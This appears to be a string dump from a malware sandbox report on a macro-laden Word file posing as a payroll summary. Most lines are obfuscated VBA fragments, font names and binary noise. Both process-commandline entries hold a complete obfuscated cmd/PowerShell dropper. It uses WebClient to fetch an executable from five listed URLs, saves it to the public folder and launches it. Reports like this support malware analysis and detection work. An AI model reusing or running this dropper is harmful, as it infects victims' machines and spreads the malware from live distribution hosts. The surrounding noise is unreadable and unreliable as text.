_VBA_PROJECTFPAOsHRZpzGcVHYQzTZADLcFXJtFRE7PROJECTdV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`0owVBjAg5643APcwM1257zflwD1A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(powershell.exe
)
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
`S0C6Xo}wEq~.j%\XGO1<sS35k$`28[/=s/5%}mcc);PmO@!T3@6v>a lySh/7zouO\&8,u{U[jsawY}[w(n#a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`TuLru$(7A$QHSNH90228.McXBL.ZwJE.ZWhhiPzo1wC,6a$JQO8r%Jq=578~9r=p=$6izmmpq( ozAQWvjYsnLVHOEQ3PwUlHL!021725WVdpVdFir- LLBcC`!3437ZQQDYN7954MuTNr57JLXLa DPhzE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`X X'OB2UMNJ=%VHTUTCEY0Cd.bbbb$'j ' AeXX / +?X X'U9nJ ' P H SXX 5X X'YZ&p=%TjDEXVkGksKp% tps2SAEEEE$' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
`zSjzEaAyZaQWbz30963HBGDOi887-AcjiHJUe94007LfN$BZ33* @RVMaCM%322Xrazs "LRQJoR@AcFariHSO2SQu.EozMFTWzaojzGLMGX275315Aeb, E-A@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a iDYuFSTqVnDfRGE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A ZcDditiZDN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A18215=aiSMGjEVUXjA(lWBNc$TOqzhj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A5g@uh3>3-;:]*
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
A;L11A; MNkGY;PsztPn(GjhANT$BGLkmj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AaBbCcD(
Ansi based on Image Processing
(screen_0.png)
AaBbYyZz
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
AgentAnim
Unicode based on Runtime Data
(WINWORD.EXE
)
agl7lpayr011
Ansi based on Image Processing
(screen_0.png)
AIjza(hWYZq / @HNCjjs18890Fix(zwQqFr)) + 83688 - CLng(nabaH 70764#qvNnq33935 * ZPvSI3Str(55930)XmtpiU<BrsrBiEnd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Algerian
Unicode based on Runtime Data
(WINWORD.EXE
)
Angsana New
Unicode based on Runtime Data
(WINWORD.EXE
)
anguage Specific Resources
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
aPPr0x_ma__
Ansi based on Image Processing
(screen_0.png)
aQDWOjHWkzQXuDUL 31391@tludbP850fGRmvrv!F=6121Qoaul+ 550$P! RSmEzg!73pzuaNpauwXrqk!00IIDrcPuRTRQp5+ KpLRiDHzwV
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Arabic Typesetting
Unicode based on Runtime Data
(WINWORD.EXE
)
aRhncErOiq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Arial Narrow
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
ASdNzI2jDHwwLrGWEGz)GcVEb}CVifbfVlmofGfwOUYSpicKzZlinNYbUVaEQucdi_LnzaGpjKIHIk#fPWlDbaoRwjPRviofrDKZfYUO\XEGEptiYBGPzSdaZDiOidtfXaEUrpOkhrC8MYDHMoGabIXrVPdkoGizFUJ5zjsuLaWhwzwwkbBwQfYICzIrdNSiR6OjQiqc=ZQill%jRccsbGTKaVbuYuUfZ_LiVibUjrjfczVhRR"SMSOkZbczkrRXjAWYXioqGzC1DNaWtfwLFvsQv+CTrhtAPkuuNfLHzQvJcDcoatdbQwXBiQLQJpzzktcvOmRzu^OtzOQa?WdTavvHFwHEd+hwEqq`bBVijU4hzTwZJTNcwWz}jQLBQ*LAkvMQzfwwNtl]?TMGTPWQjZGkJC';RiaPhRYkIKrPaRCSNHdBJEUJ7roKiiZAVFjipiiiSpwvbzTJFwhPC]NvwfHv/aINCfcV*zXalwTMNZGSc@GCQojxdCktSzZirLZfNGVWiKkqFwhfOtDwPjANobjnqCCwjCzapeoJYvGqiYPqOaiMqatuJvUhjlU2qcuLOz,wMvJHl$rMDPsVbIRmM1UnULXuoYTboJmFRcGiPlwIbiXoCvXhzvgYcMwrJbijTVqXjdbboMLuckpqswVbNwMzWmjtWnQZinT}itkaRpjHuvwfTcDjJRSbPsYqGBIIw@sJXuiQPJlwQdCwgUWifdl\bDbQjNX?qZzID*otoXt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AtIcz(oGJSa / oqVZwB 77713Fix(mrEzEp)) + 5351 - CLng(Juafw 74079"WZNw14261D *RWkR3Str(73044)WIbBwLj=oIYJU wOsvwWzAlE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AttachConsole
Ansi based on PCAP Processing
(network.pcap)
attempt_ng
Ansi based on Image Processing
(screen_0.png)
attempting
Ansi based on Image Processing
(screen_5.png)
AUHSGj(XjPVbqpa49J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AutoConfigURL
Unicode based on Runtime Data
(cmnmspthrd.exe
)
AutoDetect
Unicode based on Runtime Data
(WINWORD.EXE
)
aVJlBH=RSDLAu lUWWW@#55496=BGz$EF=17=GDiaLQ=0=@zfRIRO58867=pswSvF>9044=TvELU@= FjLQLmXFSlm jAhYO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
AVvICC3WIMY1O8zkJLXU`,6BOAYbQJCWzGdlsRXULw! ABpjOujd(zpuhn/ XDAQD@66571& zcovn"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
aYofqzcWsEvitbVQZxOCYaVc`,zWzzY3rIFHkVhDkVrpCpwL^wkwRRD{zLBjpcA_%TlfEvLW?jSYZvwnCKuX_kdwFL>HTRkCJzPSzwM#FCTUlVzRqbcEmKNpFOLLwBPvhwPNhUqrJBbEGccIlGlLoI<wCffbzNmTjcr`tfpdnc%tzNssnluvmr>JYpiC:VhWIjwPuPcoAJtsSAF9=XwlYmUvCbtaLLqUEMhHnrJuvDJFuPoiZunk[ucGjYksAAuvy[dOqqEZ+FIVXbcWKVDXnKnwoPbKQIOYTBwUtclG`4IwYfhfWwdBSwUXIWIorSowksPPMDtoMF:jDthiTjTCfjlFBKMGb&WIkWjTfqVwNTaUcUVvBbdHC~bGtDhljjNdYA`jmcSfwYzanJ-quaRiCdZitb%GpGVcXkn[NhHwRw7UXuHEzwvWfUtjqbEjizPYUPFcUuaIu\hsJjlWy\OGwUzuNzYhBFmGwQWRfjaf-AEQmLk:sAlWcKFPNTMutMYEASlPuwh6VQvUtFcNTKLZaXsjLjIoqijINDDfjNjKAoOCj0bvPcwBdKTmYzz<GjmJwmwaBAYiiHzMuTLLLMJCZiFiTzufS&uwmawHWuTopJBvBLamzjpfZIfAUbzPLLiOac(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a|$'mU9+mU ' l LXX w X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a|r_HBApXn9M=deW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
a}W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
B ' J'H N P RC TFFXX V XX Z \X'L `'^ d f h* j%XX l'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
b'YW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
B,$"B+B'FPAOsHRZ@pzGcVH'FDP@'Os@RA@*pzG@*V?'K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
b?QXAhiRvCwZNlB@hCkjjj JcqYwTHJM0FrRV`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
B_U__x,x'
Ansi based on Image Processing
(screen_0.png)
bac(.:n.QtoV7U~udgih={_J?Or\fo1pw8=%+JM$K5pImyD{M,nVA _[@}UE7Ihy%
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bas1Normal.ThisDocument
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bauhaus 93
Unicode based on Runtime Data
(WINWORD.EXE
)
BbKMcdWaKwQpJm("JrwHsum%KGj", 34\5QAGtXKXzCzAOuv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
bCRKNYFhYNH[FfziEwMzLmlqwhfwYhMqdhCPvDqvqaBbOcwTaWwU]WFOCMDvFLBCoIrzsOjp1FBRjpDsZpnRbQvMijfAamzLnIiUVMIiTMlOXSdY3lLkwnIAOWwBXIzikf`jHkvIAJCYDilAegwHivquwaEO.owVjmAPcwMzflwDpPVpDppp"FRciIIYjrLiK*MmVDlokEMEvpzrCP+dnYzSo0LZDwv2wcMOuZSAsTjALwBqBPTjwkmJjNRP5djzcpDocTvjwpnRYv'sWpHhLJcnuZmJvvN^SuIwjCQOMbhzd[UavTIouMpYupDtaXZBrtpnqaabXSsKjjnooi,zwAFzOoUAt2KTtNmqd%KUKTBrXsJakGHhPDwLkDhzitjl`BHwJTWmdzuaOMksPEE:PbGCiciqzILsssQaE,olhfZf+_IdFGAj>nTcjw6VviPt`rccYSowi{YmInzBlsIij2mQjbuM/pCPjjnkSOaEVHQJAjBjnMhbuqXL[raVJlH~RSDLozulUWWWEBGzEFVGDiaLQszfRIROpswSvFTvELU8FjLQLmXFSlmjAhYO_ONltAmBIPNnm'AnZXiUEkKJrdj:MIJjjFfvFlfw&sipmNzEHndDCXFvVwzZMOif}]DHNuj{cdjbz_CQNoubajJFZ:cAvsijBhBpWbrBVVfp PMpiLfzwiSSjuDsWBbqMCczwNKbAjjzcqCzSjzEozwiaBZaQWbkXHBGOiljiHJUwLLfNBZ9}RVMaCMXrazs-VLRQJoRAcFariHSOEUaRhnc]ErOiqRbkkCHPQVjRt3DLANwr(SqEfmZ@VJIjt]-aPISYrznqYHzRrFbItkWVSWFz5kUaWU=NiSwkzwAJWAdrjOAMQRCEX|`qwSCNomrqmzwHFIblAFaKJfOYnQI{iGJqhyUqlOoiZIsztcDOvJzvwLjJwNcCAv1McNJhGYwzkEt:GcXvNhSccjaiGplB:PtjohwLHqZp8FHnwEi?zONwHnXuOSKwiSOjLJErOpIzkip)jTjlFDZAzSXbliFVG[mGzYpULYvpSEzjJmZzOlVTiuDrnkEuwRMuNGdUQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Berlin Sans FB Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
BExposeTemplateDeriv$CustomizC1Sub GuJqoJ(uIvtS)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
bg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
BGFzF!BZcmTi!iWthmzRp6X,b zwtSw"95A,KWCdS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
bk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
bKiKzN\RzzB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
bkkC"ePQVjRt DLANwr1712#SqXEfm#52V0JIjt33892aPISY2rznqYHeBRrFbI!WVSWFzkUaWU NiSwk2wAJW(drjOA!QRCEX938qwSCN.1894& mrqmz229C@HFIb6951AAFaK2J93@p2fO0YnQI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Blackadder ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
bmDJCdqwppCzHSczCInilOPwquPfrtQEzv= EiZotErDdqri6ZAzPaCFwSPFzXVBzQDViwzVORjzYwCnjzLNC)bASwK/VFzQFrWDRoXHwuRHNnYqjj6G
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bodoni MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Bold Italic
Ansi based on PCAP Processing
(network.pcap)
Book Antiqua
Unicode based on Runtime Data
(WINWORD.EXE
)
Bookman Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
boucEQ[(ciAiQA< rwvzz!h8506
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bp9fsc-QEQEQEQEQEQEQE I-PEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPE;PEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEr9#((Is
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
BpZdE*40122
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Bradley Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
BrowalliaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
BVYaXAUhcqoAfnVuY57v1ObwPBXkj6 80fKobW5103#avjBbR3909co0rkXzaO16acWmEL0D UAqrT dV(LzcaZNb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
bW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
bW0f0O0`0U0D0(
Ansi based on PCAP Processing
(network.pcap)
bWyMx/.,5%gm
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
BYJoK(iIfwim
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
b{6:mW[K{,"<]k[#,OXu;Qx/5(+[#=OJ>K3eY`:4yd(?cR?|=gNN[X(TvD~2g#R]go1iF`<{7xY`0N8'zWb?e5l*23F#
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
c'`n0j0D0
Ansi based on PCAP Processing
(network.pcap)
c8A?Picture 1"RVG`BY\44|ZVDFyVG`BY\44|ZJFIF``C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
C_DhtE|q> [OWo#8/E(W[itrFWxc_1d~;s^%n.q}Eqc0T#M-^tOz}=
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Californian FB
Unicode based on Runtime Data
(WINWORD.EXE
)
Cambria Math
Unicode based on Runtime Data
(WINWORD.EXE
)
Castellar
Unicode based on Runtime Data
(WINWORD.EXE
)
CcDLj(ICMTmKzCVKBT!c6689zjOidb491 alwSBl320hDFQDjz802"HPNrcQ8 P3PUHzD $@ojFaqQ C GiBof@scSSG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cdvcMmuMmHSRtWjIFU19906*EBajLB2494CvoMr15265!bCsCr[94251lKzGXic+3742+DWAh&?tCdGRXwQpJm(ByVal LYpRJHtwuOCsR As @ing, mGqOdYnIP, XwERnXf
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Century Schoolbook
Unicode based on Runtime Data
(WINWORD.EXE
)
CFVATe nFCzKsowcA<27814eDQHVO3`64001.N0CUmf,85231Purs*a3u8;UL0NDCW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
charact_rc
Ansi based on Image Processing
(screen_0.png)
cHEtzpjStulz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cjbo-wJE@@EnJQE&FbdsmU@a0dasn@(( '( )'x'+]03[em ohS2,@878545B>, 1178<wvuWHkThnA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cjjUC_KAfMvWNidAmVGFcUKAAuwdGsXoRuJuYtjjCbNlEvXzLYTFYPEGCHwYe5qrIPhiizVPKjCzFYoFppMbU;xcdvcMS7}uMmHSRM_tWjIFU3EBajL$CvoMrCsCrE*-KzGXic=DWAhYtCdGR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ck01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
Cl_pbaard
Ansi based on Image Processing
(screen_0.png)
Clipbaard
Ansi based on Image Processing
(screen_5.png)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(cmd.exe)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(00010503-00004016)
CMG="0D0FF364xME@@"fB``Nh^ d(FfHbPJ`pdxN0d8dFX^`dB0xbbHXdbHb8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Comic Sans MS
Unicode based on Runtime Data
(WINWORD.EXE
)
CompanyName
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
ConsoleTracingMask
Unicode based on Runtime Data
(powershell.exe
)
Cooper Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Copperplate Gothic Light
Unicode based on Runtime Data
(WINWORD.EXE
)
CordiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Corporation
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
Courier New
Unicode based on Runtime Data
(WINWORD.EXE
)
CpoPHa1YdQUZvVlTKPr>KqiiOOiWGoYCMrTCkWOGinDGUVKPSCDoiZdMAuHKf3FFtAIiiNubDbbzLrWRwrSqJYVTtnHBNLP4 JGnlSumizosJmiCAwSTJs;[zHhlBAZcDdi2tiZDNtdWGzMszzHtchCdBu*iXLofJXYOGSdBkZScVKBZEYJifO5KRRIEEZYsnKJ YcRVNebvpiir0IRTAFYikQSjTQpdDcWq*ScGoUKVmmivXnPXYeswEwl)sNHnOwqtQDNzvzwjlSWfoHSq6QMjIjWoSHfwP\PiXMKLIvRTjiiYzVXj=lhjZJRhWTjGsRvIPb*oqQpFfFjfdrjItpfRBSijwX|wULGEqFiSuR5ziGmE#DwIcP.alJGTdjucaQjNpwYoSUaVCRPjlvLIjuBXbKwGMsfRKWCioqJazInzNLFndLnvEIJDbECZRbBS{rzlaa.OjLabGijrWWqbNlfYYrMwuzkvcWZNUGEbczzPaqajiwVGw6ZYovKc}zijHdk5iCQmmNnPzhGzddzJZwbmw:qlqod
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
CQNou2ajJFZcAvsG/ 686372hBpWbraC6621eBVVfp%4206eMpiLf9056azwiSSE6763b0juDs?'BbqMCczwNKba2`qC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ctFWYNXIAXtYEjtM{/ 9792Q@zRvMPa72@QYAjitj``L21@VTGpuJ60`QNAQdjFfe800z0junarNlfcWpZjXEvoZbzwE
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cW1Table49WordDocumentSummaryInformation(DDocumentSummaryInformation8L
Ansi based on Dropped File
(~WRD0000.tmp)
cW1Table4f!WordDocumentSummaryInformation(sDocumentSummaryInformation8{PMacrosVBAdir__SRP_0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
cW1Table4WordDocumentSummaryInformation(DDocumentSummaryInformation8L
Ansi based on Dropped File
(~WRD0003.tmp)
